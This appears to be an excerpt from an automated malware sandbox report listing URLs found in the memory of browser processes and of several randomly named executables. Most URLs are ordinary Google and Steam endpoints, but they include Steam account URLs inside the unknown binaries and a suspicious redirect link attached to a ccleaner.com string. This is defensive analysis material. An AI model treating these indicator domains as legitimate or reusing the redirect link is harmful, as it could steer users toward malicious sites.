Source: chrome.exe, 00000019.00000003.2391832280.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391727899.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2386269536.00006AE400F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742537643.00006AE4002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2390457029.00006AE401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391162524.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391377595.00006AE40104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2388080460.00006AE401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2392772851.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391783961.00006AE400A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000019.00000002.2813667061.00006AE400E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806626138.00006AE4007D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 8f25543307.exe, 00000014.00000003.2792382569.0000000005E2D000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2852968105.0000000005671000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2783101019.000000000590E000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2784760185.000000000590E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: chrome.exe, 00000019.00000002.2808809699.00006AE400A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000019.00000002.2739778208.00006AE40007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000019.00000002.2739778208.00006AE40007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetj
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811370624.00006AE400C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000019.00000002.2739413377.00006AE40001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811370624.00006AE400C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000019.00000002.2739958511.00006AE40009C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000019.00000002.2739958511.00006AE40009C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000019.00000002.2739778208.00006AE40007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574supportsExternalSemaphoreFd
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806787022.00006AE400830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000019.00000002.2806787022.00006AE400830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246ar
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api2
Source: chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 00000019.00000003.2378597945.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380888406.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2746724756.00006AE400670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2746124895.00006AE400630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396019013.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396891889.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2395949608.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380808144.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393104369.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000019.00000002.2816108386.00006AE401188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808602660.00006AE400A14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808404693.00006AE4009DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000019.00000003.2398921126.00006AE400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742340293.00006AE4002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2382291975.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378237323.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380057243.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378597945.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380888406.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396019013.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396891889.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2395949608.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380808144.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393104369.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000019.00000003.2368003986.000067A0006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2738878513.000067A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000019.00000003.2366948695.000067A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2366620579.000067A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000019.00000003.2368003986.000067A0006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2738878513.000067A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000019.00000003.2366948695.000067A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2366620579.000067A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000019.00000002.2738878513.000067A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
